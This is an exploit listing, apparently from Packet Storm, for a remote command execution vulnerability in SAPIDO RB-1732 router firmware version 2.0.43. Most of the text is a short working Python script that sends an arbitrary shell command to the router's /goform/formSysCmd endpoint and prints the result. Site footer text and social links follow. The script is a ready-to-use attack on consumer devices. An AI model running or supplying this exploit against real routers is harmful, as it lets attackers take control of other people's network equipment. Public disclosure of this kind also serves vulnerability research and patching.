SAPIDO RB-1732 version 2.0.43 suffers from a remote command execution vulnerability.
8c2ffa8c45bd6258d34b73f2418379b89138a62e8600141be0baac10df62bde8# Exploit Title: SAPIDO RB-1732 command line execution
# Date: 2019-6-24
# Exploit Author: k1nm3n.aotoi
# Vendor Homepage: http://www.sapido.com.tw/
# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
# Version: RB-1732 V2.0.43
# Tested on: linux
import requests
import sys
def test_httpcommand(ip, command):
my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
content = r.text
content = content[
content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
content.rfind('</textarea>')]
return content
print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed